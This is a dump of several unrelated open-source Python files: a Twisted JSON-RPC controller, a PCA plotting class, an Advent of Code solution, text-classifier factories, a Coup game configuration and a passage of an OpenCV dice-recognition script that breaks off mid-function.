Controller(jsonrpc.JSONRPC,object):\n\tdef __init__(self, dbnodes, dbtemplates, datafile_dir, queue, port = None):\n\t\tself.__name = \"Controller\"\n\t\tself.__port = port\n\t\tself.__dbnodes = dbnodes\n\t\tself.__dbtemplates = dbtemplates\n\t\tself.__datafile_dir = datafile_dir\n\t\tself.__run_queue = Queue.Queue()\n\t\tself.__rescue_queue = Queue.Queue()\n\t\tself.__dead_nodes_queue = queue\n\t\t# look for orphan comps\n\t\tself.__corph = CompOrphan(self.__dbnodes, self.__rescue_queue, self.__dead_nodes_queue)\n\t\tself.__corph.start()\n\t\t# rescue comps\n\t\tself.__cres = CompRescue(self.__dbnodes, self.__run_queue, self.__rescue_queue)\n\t\tself.__cres.start()\n\t\t# start/stop compositions\n\t\tself.__chand = CompHandler(self.__dbnodes, self.__run_queue, self.__rescue_queue)\n\t\tself.__chand.start()\n\n\tdef __get_tempdef_from_id(self, temp_id):\n\t\twith sqlite3.connect(self.__dbtemplates) as conn:\n\t\t\tretcode = conn.execute(\"select template from templatedefs where temp_id = ?\", (temp_id,))\n\t\ttemp = retcode.fetchone()\n\t\treturn ( TemplateDefinition(temp[0]) if temp else None)\n\n\tdef __select_nodes(self, num_nodes = 1):\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tconn.text_factory = str\n\t\t\tretcode = conn.execute(\"select ip,port from bmnodes limit ?\", (num_nodes,))\n\t\timport random\n\t\t#FIX THIS: pick a random port?\n\t\treturn [ (ip,port,random.randint(10000,10100)) for (ip,port) in retcode ]\n\n\t#################################\n\t# JSONRPC: TEMPLATE DEFINITIONS #\n\t#################################\n\tdef __put_template(self, temp_id, temp):\n\t\twith sqlite3.connect(self.__dbtemplates) as conn:\n\t\t\ttry:\n\t\t\t\tconn.execute(\"insert into templatedefs (temp_id,template) values (?,?)\", (temp_id,temp))\n\t\t\texcept sqlite3.IntegrityError: \n\t\t\t\treturn RetVal.CODE_FAILURE\n\t\treturn RetVal.CODE_SUCCESS\n\n\tdef __remove_template(self, temp_id):\n\t\twith sqlite3.connect(self.__dbtemplates) as conn:\n\t\t\tretcode = conn.execute(\"delete from templatedefs where temp_id = ? \", (temp_id,))\n\t\treturn retcode.rowcount\n\n\tdef __get_templates(self):\n\t\twith sqlite3.connect(self.__dbtemplates) as conn:\n\t\t\tretcode = conn.execute(\"select temp_id from templatedefs\")\n\t\treturn [ row[0] for row in retcode ]\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_put_template(self, temp):\n\t\t\"\"\"\\brief receive template definitions\n\t\t\\param temp (\\c string) xml template definition\n\t\t\\return (\\c ReturnValue) Value member is empty\n\t\t\"\"\"\n\t\tlog.msg(\"received put_template definition request\", system = self.__name)\n\t\ttempdef = TemplateDefinition(temp)\n\t\tif tempdef.dom is None:\n\t\t\tr = ReturnValue(ReturnValue.CODE_FAILURE, \"not well-formed template\", None)\n\t\t\tdefer.returnValue(jsonpickle.encode(r))\n\t\ttemp_id = tempdef.temp_id\n\t\tretcode = yield threads.deferToThread(self.__put_template, temp_id, temp)\n\t\tmsg = (\"added template definition\" if retcode is RetVal.CODE_SUCCESS else \"template already exists\")\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, msg, None)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_remove_template(self, temp_id):\n\t\t\"\"\"\\brief remove a given template definition based on the template definition id\n\t\t\\param temp_id (\\c string) template definition ID\n\t\t\\return (\\c ReturnValue) Value member is empty\n\t\t\"\"\"\n\t\tlog.msg(\"received remove_template definition request\", system = self.__name)\n\t\tdeleted = yield threads.deferToThread(self.__remove_template, temp_id)\n\t\tmsg = (\"deleted template definition\" if deleted else \"template does not exist\")\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, msg, None)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_get_templates(self):\n\t\t\"\"\"\\brief return the list of existing templates definitions \n\t\t\\return (\\c ReturnValue) The template definitions' XML (list[string])\n\t\t\"\"\"\n\t\tlog.msg(\"received get_templates request\", system = self.__name)\n\t\ttemplates = yield threads.deferToThread(self.__get_templates)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, \"list of template definitions\", templates)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\t\n\t###############################\n\t# JSONRPC: TEMPLATE INSTANCES #\n\t###############################\n\n\tdef __is_temp_running(self,temp_id):\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tretcode = conn.execute(\"select comp_id from comps where temp_id = ?\", (temp_id,))\n\t\tcomps = [row[0] for row in retcode]\n\t\treturn (True if len(comps) else False)\n\n\tdef __invoke_template(self, temp, ext_nodes):\n\t\t\"\"\"\\brief invoke a template instance\n\t\t\\param temp (\\c string) xml template instance\n\t\t\\param ext_nodes (\\c list) list of nodes\n\t\t\\return (\\c RetVal) \n\t\t\"\"\"\n\t\ttins = TemplateInstance(temp)\n\t\ttemp_id = tins.temp_id\n\t\tif self.__is_temp_running(temp_id):\n\t\t\tlog.msg(\"template already running\", system = self.__name)\n\t\t\treturn RetVal.CODE_SUCCESS\n\t\ttdef = self.__get_tempdef_from_id(temp_id)\n\t\tif not tdef:\n\t\t\tlog.msg(\"no template definition for the given id\", system = self.__name)\n\t\t\treturn RetVal.CODE_FAILURE\n\t\tt = TemplateRun(tdef, tins, self.__datafile_dir)\n\t\tif t.install() is RetVal.CODE_FAILURE:\n\t\t\tlog.msg(\"error while installing template\", system = self.__name)\n\t\t\treturn RetVal.CODE_FAILURE\n\t\tnum_nodes = t.get_num_nodes()\n\t\tif len(ext_nodes) > 0: nodes = ext_nodes\n\t\telse: nodes = self.__select_nodes(num_nodes = num_nodes)\n\n\t\tif len(nodes) < num_nodes :\n\t\t\tlog.msg(\"%d node(s) available (%d needed)\" % (len(nodes),num_nodes), system = self.__name)\n\t\t\treturn RetVal.CODE_FAILURE\n\t\t#if t.assign_nodes(nodes) is RetVal.CODE_FAILURE:\n\t\tif t.assign_nodes(nodes)[0] is RetVal.CODE_FAILURE:\n\t\t\tlog.msg(\"error while assigning nodes to template\", system = self.__name)\n\t\t\treturn RetVal.CODE_FAILURE\n\t\tlog.msg(\"send comps to the run queue\", system = self.__name)\n\t\tfor comp in t.compsrun: \n\t\t\tself.__run_queue.put( (temp_id,comp,'start_composition') )\n\t\treturn RetVal.CODE_SUCCESS\n\n\tdef __stop_template(self, temp_id):\n\t\tlog.msg(\"stopping template instance %s\" % temp_id, system = self.__name)\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tretcode = conn.execute(\"select compobj from comps where temp_id = ?\", (temp_id,))\n\t\tcomps_db = [comp[0] for comp in retcode]\n\t\tfor comp_db in comps_db:\n\t\t\tcomp = cPickle.loads(str(comp_db))\n\t\t\tself.__run_queue.put( (temp_id,comp,'stop_composition') )\n\t\treturn RetVal.CODE_SUCCESS\n\n\tdef __expand_template(self, temp):\n\t\t\"\"\"\\brief expand a template instance\n\t\t\\param temp (\\c string) xml template instance\n\t\t\\return (\\c RetVal,list) list is None or the list of nodes \n\t\t\"\"\"\n\t\ttins = TemplateInstance(temp)\n\t\ttemp_id = tins.temp_id\n\t\tif self.__is_temp_running(temp_id):\n\t\t\tlog.msg(\"template already running\", system = self.__name)\n\t\t\treturn (RetVal.CODE_SUCCESS, None)\n\t\ttdef = self.__get_tempdef_from_id(temp_id)\n\t\tif not tdef:\n\t\t\tlog.msg(\"no template definition for the given id\", system = self.__name)\n\t\t\treturn (RetVal.CODE_FAILURE, None)\n\t\tt = TemplateRun(tdef, tins, self.__datafile_dir)\n\t\tif t.install() is RetVal.CODE_FAILURE:\n\t\t\tlog.msg(\"error while installing template\", system = self.__name)\n\t\t\treturn (RetVal.CODE_FAILURE, None)\n\t\tnum_nodes = t.get_num_nodes()\n\t\tnodes = self.__select_nodes(num_nodes = num_nodes)\n\t\tif len(nodes) < num_nodes :\n\t\t\tlog.msg(\"%d node(s) available (%d needed)\" % (len(nodes),num_nodes), system = self.__name)\n\t\t\treturn (RetVal.CODE_FAILURE, None)\n\t\t(retval,all_info) = t.assign_nodes(nodes)\n\t\tif retval is RetVal.CODE_FAILURE:\n\t\t\tlog.msg(\"error while assigning nodes to template\", system = self.__name)\n\t\t\treturn (RetVal.CODE_FAILURE, None)\n\t\treturn (RetVal.CODE_SUCCESS,all_info)\n\t\t#return (RetVal.CODE_SUCCESS,nodes)\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_invoke_template(self, temp, nodes = []):\n\t\t\"\"\"\\brief listen for template invocation request\n\t\t\\param temp (\\c string) xml template instance\n\t\t\\param auth (\\c boolean) authorization from WPOC needed\n\t\t\\return (\\c ReturnValue) Value member is empty\n\t\t\"\"\"\n\t\tlog.msg(\"received invoke_template request\", system = self.__name)\n\t\ttempins = TemplateInstance(temp)\n\t\tif tempins.dom is None:\n\t\t\tr = ReturnValue(ReturnValue.CODE_FAILURE, \"not well-formed template\", None)\n\t\t\tdefer.returnValue(jsonpickle.encode(r))\n\t\tretcode_dict = None\n\t\tretcode = yield threads.deferToThread(self.__invoke_template,temp, nodes)\n\t\tif retcode is RetVal.CODE_SUCCESS:\n\t\t\tcode,msg = ReturnValue.CODE_SUCCESS,\"invocation sent to nodes\"\n\t\telse:\n\t\t\tcode,msg = ReturnValue.CODE_FAILURE,\"error during invocation\"\n\t\tr = ReturnValue(code, msg, None)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_stop_template(self, temp_id):\n\t\t\"\"\"\\brief stop a running template instance \n\t\t\\param temp_id (\\c string) template instance ID\n\t\t\\return (\\c ReturnValue) Value member is empty\n\t\t\"\"\"\n\t\tlog.msg(\"received stop_template request\", system = self.__name)\n\t\tretcode = yield threads.deferToThread(self.__stop_template,temp_id)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, \"stop request sent to nodes\", None)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_expand_template(self, temp):\n\t\t\"\"\"\\brief listen for requests to expand template\n\t\t\\param temp (\\c string) xml template instance\n\t\t\\return (\\c ReturnValue) Value member contains a list of (ip,port,port_in_use,comp_xml)\n\t\t\"\"\"\n\t\tlog.msg(\"received expand_template request\", system = self.__name)\n\t\ttempins = TemplateInstance(temp)\n\t\tif tempins.dom is None:\n\t\t\tr = ReturnValue(ReturnValue.CODE_FAILURE, \"not well-formed template\", None)\n\t\t\tdefer.returnValue(jsonpickle.encode(r))\n\t\tretcode_dict = None\n\t\t(retcode,nodes) = yield threads.deferToThread(self.__expand_template,temp)\n\t\tif retcode is RetVal.CODE_SUCCESS:\n\t\t\tcode,msg = ReturnValue.CODE_SUCCESS,\"template expanded\"\n\t\t\tvalue = nodes\n\t\telse:\n\t\t\tcode,msg = ReturnValue.CODE_FAILURE,\"error during expansion\"\n\t\t\tvalue = None\n\t\tr = ReturnValue(code, msg, value)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t#######################\n\t# JSONRPC: BLOCK INFO #\n\t#######################\n\n\tdef __parse_get_variable(self, ret_values):\n\t\toutmsg = []\n\t\tfor (success,retval) in ret_values:\n\t\t\tif success: outmsg.append(jsonpickle.decode(retval))\n\t\treturn outmsg\n\n\tdef __get_variable(self, temp_id, comp_id, variable):\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tconn.text_factory = str\n\t\t\tretcode = conn.execute(\"select ipsrc,sport from comps where temp_id = ? and comp_id = ?\", (temp_id, comp_id))\n\t\tnodes = [node for node in retcode]\n\t\tdeflist = [CompUtils.query(ip, port, 'read_variables', comp_id,variable) for ip,port in nodes]\n\t\td = defer.DeferredList(deflist,consumeErrors=1)\n\t\td.addCallback(self.__parse_get_variable)\n\t\treturn defer.DeferredList(deflist,consumeErrors=1)\n\n\tdef __write_variable(self, temp_id, comp_id, variable):\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tconn.text_factory = str\n\t\t\tretcode = conn.execute(\"select ipsrc,sport from comps where temp_id = ? and comp_id = ?\", (temp_id, comp_id))\n\t\tnodes = [node for node in retcode]\n\t\tdeflist = [CompUtils.query(ip, port, 'write_variables', comp_id,variable) for ip,port in nodes]\n\t\td = defer.DeferredList(deflist,consumeErrors=1)\n\t\td.addCallback(self.__parse_get_variable)\n\t\treturn defer.DeferredList(deflist,consumeErrors=1)\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_get_variable(self, temp_id, comp_id, block_id, var_id):\n\t\t\"\"\"\\brief get the value of a variable\n\t\t\\param temp_id (\\c string) template instance ID\n\t\t\\param comp_id (\\c string) composition ID\n\t\t\\param block_id (\\c string) block ID\n\t\t\\param var_id (\\c string) variable ID\n\t\t\\return (\\c ReturnValue) The values (list[ReturnValue])\n\t\t\"\"\"\n\t\tlog.msg(\"received get_variable request\", system = self.__name)\n\t\tvariable = [ [ block_id, var_id, \"\", \"read\" ] ]\n\t\tretvals = yield self.__get_variable(temp_id, comp_id, variable)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS,None,retvals)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\t\n\t@defer.inlineCallbacks\n\tdef jsonrpc_write_variable(self, temp_id, comp_id, block_id, var_id, var_val):\n\t\t\"\"\"\\brief get the value of a variable\n\t\t\\param temp_id (\\c string) template instance ID\n\t\t\\param comp_id (\\c string) composition ID\n\t\t\\param block_id (\\c string) block ID\n\t\t\\param var_id (\\c string) variable ID\n\t\t\\param var_val (\\c string) value to assign to the variable ID\n\t\t\\return (\\c ReturnValue) The values (list[ReturnValue])\n\t\t\"\"\"\n\t\tlog.msg(\"received write_variable request\", system = self.__name)\n\t\tvariable = jsonpickle.encode([VariableInfo(block_id, var_id, \"\", \"write\", var_val)])\n\t\tretvals = yield self.__write_variable(temp_id, comp_id, variable)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS,None,retvals)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t#########################\n\t# JSONRPC: GENERAL INFO #\n\t#########################\n\n\tdef __get_blocks_list(self):\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tretcode = conn.execute(\"select distinct name from blocks\")\n\t\treturn [row[0] for row in retcode]\n\n\tdef __get_blocks_info(self, block_types):\n\t\tblock_infos = []\n\t\twith sqlite3.connect(self.__dbnodes) as conn:\n\t\t\tfor name in block_types:\n\t\t\t\tretcode = conn.execute(\"select distinct info from blocks where name = ?\", (name,))\n\t\t\t\ttry: info = retcode.fetchone()[0]\n\t\t\t\texcept TypeError: info = \"no info available\"\n\t\t\t\tblock_infos.append(info)\n\t\treturn [cPickle.loads(str(b)) for b in block_infos]\n\n\tdef __save_datafile(self, fname, databin):\n\t\timport base64\n\t\tdata = base64.b64decode(databin)\n\t\tf = open(self.__datafile_dir +'/'+fname,'w')\n\t\ttry: f.write(data)\n\t\texcept: return RetVal.CODE_FAILURE\n\t\tf.close()\n\t\treturn RetVal.CODE_SUCCESS\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_get_supported_blocks(self):\n\t\t\"\"\"\\brief return the list of supported blocks,\n\t\t\\return (\\c ReturnValue) The list of blocks (list[string])\n\t\t\"\"\"\n\t\tlog.msg(\"received get_supported_blocks request\", system = self.__name)\n\t\tblocks = yield threads.deferToThread(self.__get_blocks_list)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, \"supported blocks\", blocks)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\t@defer.inlineCallbacks\n\tdef jsonrpc_get_block_infos(self, block_types):\n\t\t\"\"\"\\brief return the info about the given set of blocks,\n\t\t\\param (\\c list[string]) block_types the block types (e.g., [\"PFQSource\"]\n\t\t\\return (\\c ReturnValue) The information (list[BlockInfo])\n\t\t\"\"\"\n\t\tlog.msg(\"received get_blocks_info request\", system = self.__name)\n\t\tblock_infos = yield threads.deferToThread(self.__get_blocks_info, block_types)\n\t\tmsg = \"block infos\"\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, msg, block_infos)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n\n\tdef jsonrpc_get_supported_topologies(self):\n\t\t\"\"\"\\brief return the list of supported topology\n\t\t\\return (\\c ReturnValue) The list of supported topologies\n\t\t\"\"\"\n\t\tlog.msg(\"received get_supported_topology request\", system = self.__name)\n\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, \"supported topologies\", Topology.TOPO_TYPES)\n\t\treturn jsonpickle.encode(r)\n\t\n\t@defer.inlineCallbacks\n\tdef jsonrpc_save_datafile(self, fname, databin):\n\t\t\"\"\"\\brief receive the datafile to send to nodes\n\t\t\\param fname (\\c string) file name\n\t\t\\param databin (\\c base64) b64 encoded file\n\t\t\\return (\\c ReturnValue) Value is empty\n\t\t\"\"\"\n\t\tlog.msg(\"received save_datafile request\", system = self.__name)\n\t\tretcode = yield threads.deferToThread(self.__save_datafile,fname,databin)\n\t\tr = ReturnValue(ReturnValue.CODE_FAILURE, \"cannot save datafile\", None)\n\t\tif retcode == RetVal.CODE_SUCCESS:\n\t\t\tr = ReturnValue(ReturnValue.CODE_SUCCESS, \"datafile saved successfully\", None)\n\t\tdefer.returnValue(jsonpickle.encode(r))\n","repo_name":"mdusi/blockmon-controller","sub_path":"twisted/plugins/core/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":15866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"12996515546","text":"'''\nThis file originally came from https://github.com/eriklindernoren/ML-From-Scratch/blob/master/unsupervised_learning/principal_component_analysis.py\nIt has been adapted a lot and most of the original was removed. This file is basically used only for the Transform method.\n'''\n\nimport sys\nimport os\nfrom sklearn import datasets\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\ndir_path = os.path.dirname(os.path.realpath(__file__))\nsys.path.insert(0, dir_path + \"/../utils\")\nfrom data_operation import calculate_covariance_matrix\nfrom data_operation import calculate_correlation_matrix\nfrom data_manipulation import standardize\n\nredPatch = mpatches.Patch(color='red', label='Hinge movement')\ngreenPatch = mpatches.Patch(color='green', label='Pendulum movement')\n \ngraphLegend = [greenPatch, redPatch]\n\nclass PCA():\n def __init__(self): pass\n\n \n\n def plotInNd(self, features, X, y = None):\n n = len(features)\n X_transformed = self.transform(X, n_components = max(features)+1)\n \n # Another option is to loop and plot a single feature at a time and show at the end?\n \n for i in range(n):\n \n pass\n \n \n if n == 3:\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n x1 = X_transformed[:, features[0]]\n x2 = X_transformed[:, features[1]]\n x3 = X_transformed[:, features[2]]\n ax.scatter(x1, x2, x3, c=y)\n else:\n x1 = X_transformed[:, features[0]]\n x2 = X_transformed[:, features[1]]\n plt.scatter(x1, x2, c=y)\n plt.show()\n \n # Plot the dataset X and the corresponding labels y in 2D using PCA.\n def plot_in_2d(self, X, y=None, labels = []):\n X_transformed = self.transform(X, n_components=2)\n x1 = X_transformed[:, 0]\n x2 = X_transformed[:, 1]\n plt.scatter(x1, x2, c=y)\n# plt.title(labels[0])\n# plt.xlabel(labels[1])\n# plt.ylabel(labels[2])\n# plt.legend(handles = graphLegend)\n plt.show()\n\n # Plot the dataset X and the corresponding labels y in 3D using PCA.\n def plot_in_3d(self, X, y=None, labels = []):\n X_transformed = self.transform(X, n_components=3)\n x1 = X_transformed[:, 0]\n x2 = X_transformed[:, 1]\n x3 = X_transformed[:, 2]\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(x1, x2, x3, c=y)\n# plt.title(labels[0])\n# plt.xlabel(labels[1])\n# plt.ylabel(labels[2])\n \n # Do I add the \n \n plt.show()\n\n # Fit the dataset to the number of principal components\n # specified in the constructor and return the transform dataset\n def transform(self, X, n_components):\n covariance = calculate_covariance_matrix(X)\n \n # Get the eigenvalues and eigenvectors.\n # (eigenvector[:,0] corresponds to eigenvalue[0])\n eigenvalues, eigenvectors = np.linalg.eig(covariance)\n \n # Sort the eigenvalues and corresponding eigenvectors from largest\n # to smallest eigenvalue and select the first n_components\n idx = eigenvalues.argsort()[::-1]\n eigenvalues = eigenvalues[idx][:n_components]\n eigenvectors = np.atleast_1d(eigenvectors[:, idx])[:, :n_components]\n \n # Project the data onto principal components\n X_transformed = X.dot(eigenvectors)\n \n return X_transformed\n\ndef main():\n # Load the dataset\n data = datasets.load_iris()\n X = data.data\n y = data.target\n\n # Project the data onto the 2 primary principal components and plot the\n # data\n pca = PCA()\n# pca.plot_in_3d(X, y, ['','',''])\n pca.plot_in_3d( X, y, ['','',''])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"matt123miller/Learning-Python-ML","sub_path":"FYP/principal_component_analysis.py","file_name":"principal_component_analysis.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36635880468","text":"def part2(lanterns):\n fishes = [0] * 9\n\n for x in lanterns:\n fishes[x] += 1\n\n for x in range(256):\n fishes = fishes[1:] + fishes[:1]\n fishes[6] += fishes[8]\n\n return sum(fishes)\n\n\ndef part1(lanterns):\n days = 0\n\n while days != 80:\n x = 0\n length = len(lanterns)\n\n while x < length:\n if lanterns[x] == 0:\n lanterns[x] = 6\n lanterns.append(8)\n x += 1\n \n else:\n lanterns[x] -= 1\n x += 1\n \n days += 1\n\n return len(lanterns)\n\n\ndef main():\n with open('F - inputs.txt') as f:\n lanterns = list(map(int, f.read().split(',')))\n print(f'PART 1 - {part1(lanterns)}')\n\n with open('F - inputs.txt') as f:\n lanterns = list(map(int, f.read().split(',')))\n print(f'PART 2 - {part2(lanterns)}')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JaViLuMa/AdventOfCode2021","sub_path":"F - Advent - 6.py","file_name":"F - Advent - 6.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40411723178","text":"from small_text.classifiers.factories import AbstractClassifierFactory\nfrom small_text.integrations.transformers.classifiers.classification import \\\n TransformerBasedClassification\nfrom small_text.integrations.transformers.classifiers.setfit import SetFitClassification\n\n\nclass TransformerBasedClassificationFactory(AbstractClassifierFactory):\n\n def __init__(self, transformer_model_args, num_classes, kwargs={}):\n \"\"\"\n Parameters\n ----------\n transformer_model_args : TransformerModelArguments\n Name of the sentence transformer model.\n num_classes : int\n Number of classes.\n kwargs : dict\n Keyword arguments which will be passed to `TransformerBasedClassification`.\n \"\"\"\n self.transformer_model_args = transformer_model_args\n self.num_classes = num_classes\n self.kwargs = kwargs\n\n def new(self):\n \"\"\"Creates a new TransformerBasedClassification instance.\n\n Returns\n -------\n classifier : TransformerBasedClassification\n A new instance of TransformerBasedClassification which is initialized with the given keyword args `kwargs`.\n \"\"\"\n return TransformerBasedClassification(self.transformer_model_args,\n self.num_classes,\n **self.kwargs)\n\n\nclass SetFitClassificationFactory(AbstractClassifierFactory):\n \"\"\"\n .. versionadded:: 1.2.0\n \"\"\"\n\n def __init__(self, setfit_model_args, num_classes, classification_kwargs={}):\n \"\"\"\n Parameters\n ----------\n setfit_model_args : SetFitModelArguments\n Name of the sentence transformer model.\n num_classes : int\n Number of classes.\n classification_kwargs : dict\n Keyword arguments which will be passed to `SetFitClassification`.\n \"\"\"\n self.setfit_model_args = setfit_model_args\n self.num_classes = num_classes\n self.classification_kwargs = classification_kwargs\n\n def new(self):\n \"\"\"Creates a new SetFitClassification instance.\n\n Returns\n -------\n classifier : SetFitClassification\n A new instance of SetFitClassification which is initialized with the given keyword args `kwargs`.\n \"\"\"\n return SetFitClassification(self.setfit_model_args,\n self.num_classes,\n **self.classification_kwargs)\n","repo_name":"webis-de/small-text","sub_path":"small_text/integrations/transformers/classifiers/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":503,"dataset":"github-code","pt":"44"} +{"seq_id":"34924747078","text":"\"\"\"Maintains various parameters used in the game, such as the number of players and number of coins per player.\"\"\"\n\nfrom typing import NoReturn\nfrom coup.agents import *\n\nclass Config:\n \"\"\"The class storing all the config parameters.\"\"\"\n def __init__(self, **kwargs) -> None:\n self.n_players = 2\n self.local_ais = {}\n self.nonlocal_ais = {}\n\n # self.local_ais = {0: KerasAgent(load=True, training=True, debug=False),\n # 1: KerasAgent(load=True, training=False, debug=False)}\n\n self.cards_per_player = 2\n self.cards_per_character = 3\n self.starting_coins = 2\n self.penalize_first_player_in_2p_game = True\n self.first_player_coin_penalty = 1\n\n self.reaction_choice_mode = \"random_challenge\"\n\n self.mandatory_coup_threshold = 10\n\n self.n_cards_for_exchange = 2\n\n self.pay_on_successful_challenges = False\n\n self.engine_sleep_duration = 0.5\n\n self.verbose = 0\n\n # Set initial hands for each player\n self.starting_hands = None\n #self.starting_hands = {0: [\"Contessa\", \"Contessa\"],\n # 1: [\"Captain\", \"Ambassador\"]}\n\n # Set deck characters\n self.deck_configuration = None\n# self.deck_configuration = {\"Ambassador\": 0,\n# \"Assassin\": 0,\n# \"Captain\": 0,\n# \"Contessa\": 0,\n# \"Duke\": 9}\n\n\n # initialize other parameters\n for key, value in kwargs.items():\n self.__setattr__(key, value)\n\n if self.local_ais:\n self.n_players = len(self.local_ais)\n\n self.validate_args()\n\n def validate_args(self) -> NoReturn:\n \"\"\"Ensure that the starting arguments give a valid configuration.\"\"\"\n\n # Make sure that there are enough cards in the deck for the settings\n max_cards_in_use = self.n_players * self.cards_per_player + self.n_cards_for_exchange\n cards_in_deck = self.cards_per_character * 5\n if max_cards_in_use > cards_in_deck:\n raise ValueError(\"Not enough cards to play given game settings\")\n\n # Ensure first player penalty in 2p games is not greater than starting coins\n if self.n_players == 2 and self.penalize_first_player_in_2p_game:\n if self.first_player_coin_penalty > self.starting_coins:\n raise ValueError(\"First player penalty is greater than number of starting coins\")\n\n # Ensure reaction choice mode is valid\n if self.reaction_choice_mode not in [\"first\", \"random\", \"first_block\", \"first_challenge\", \"random_block\", \"random_challenge\"]:\n raise ValueError(\"Invalid reaction choice mode: {}\".format(self.reaction_choice_mode))\n\n # Ensure starting hand configuration is valid\n # Ensure all hands have the same length\n if self.starting_hands:\n assert len(set([len(self.starting_hands[i]) for i in self.starting_hands])) == 1\n assert self.n_players == len(self.starting_hands)\n\n def __str__(self) -> str:\n \"\"\"Nicely print all the game settings.\"\"\"\n rep = \"\\nGame settings:\\n\\n\"\n settings = vars(self)\n for v in settings:\n rep += \"{}: {}\\n\".format(v, settings[v])\n return rep\n","repo_name":"wes1350/Coup","sub_path":"coup/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23779689897","text":"from matplotlib import pyplot as plt, rc\r\nimport cv2 as cv\r\nimport numpy as np\r\n\r\n\r\ndef angle_cos(p0, p1, p2):\r\n d1, d2 = (p0 - p1).astype('float'), (p2 - p1).astype('float')\r\n return abs(np.dot(d1, d2) / np.sqrt(np.dot(d1, d1) * np.dot(d2, d2)))\r\n\r\n\r\ndef distance(p1, p2):\r\n return np.sqrt((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)\r\n\r\n\r\nclass Picture:\r\n def __init__(self, filename):\r\n self.filename = filename\r\n self.img = cv.imread(filename)\r\n self.img_gray = cv.cvtColor(self.img, cv.COLOR_BGR2GRAY)\r\n\r\n height, width, channels = self.img.shape\r\n self.height = height\r\n self.width = width\r\n\r\n self.kernel = np.ones((3, 3), np.uint8)\r\n\r\n def process_picture(self):\r\n squares = self.find_faces()\r\n faces = []\r\n for square in squares:\r\n min_x, min_y = np.min(square[:, 0]), np.min(square[:, 1])\r\n max_x, max_y = np.max(square[:, 0]), np.max(square[:, 1])\r\n crop_img = self.img_gray[min_y:max_y, min_x:max_x]\r\n pips = self.find_pips(crop_img)\r\n if len(pips) > 0:\r\n faces.append(square)\r\n textcoord = (int((max_x+min_x)/2), int(min_y - 10))\r\n cv.putText(self.img, str(len(pips)), textcoord, cv.FONT_HERSHEY_COMPLEX, 10, (255, 0, 0), 7)\r\n\r\n cv.drawContours(self.img, faces, -1, (0, 0, 255), 10)\r\n plt.figure(figsize=(6, 6))\r\n plt.imshow(self.img)\r\n plt.show()\r\n\r\n def find_faces(self):\r\n squares = []\r\n blur = cv.medianBlur(self.img_gray, 5)\r\n for thresh in range(255, 0, -15):\r\n _retr, binary = cv.threshold(blur, thresh, 255, cv.THRESH_BINARY)\r\n contours, _hierarchy = cv.findContours(binary, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\r\n\r\n for cnt in contours:\r\n cnt_len = cv.arcLength(cnt, True)\r\n cnt = cv.approxPolyDP(cnt, 0.02 * cnt_len, True)\r\n\r\n if 4 <= len(cnt) <= 6 and 0.005 * (self.height * self.width) < cv.contourArea(cnt) < 0.1 * \\\r\n (self.height * self.width) and cv.isContourConvex(cnt):\r\n rect = cv.minAreaRect(cnt)\r\n (x, y), (width, height), angle = rect\r\n aspect_ratio = min(width, height) / max(width, height)\r\n if aspect_ratio > 0.88:\r\n box = cv.boxPoints(rect)\r\n box = np.int0(box)\r\n squares.append(box)\r\n\r\n mass_centers = []\r\n for square in squares:\r\n m = cv.moments(square)\r\n mass_centers.append((m['m10'] / m['m00'], m['m01'] / m['m00']))\r\n\r\n indexes = []\r\n for i in range(len(mass_centers)):\r\n add = True\r\n for j in 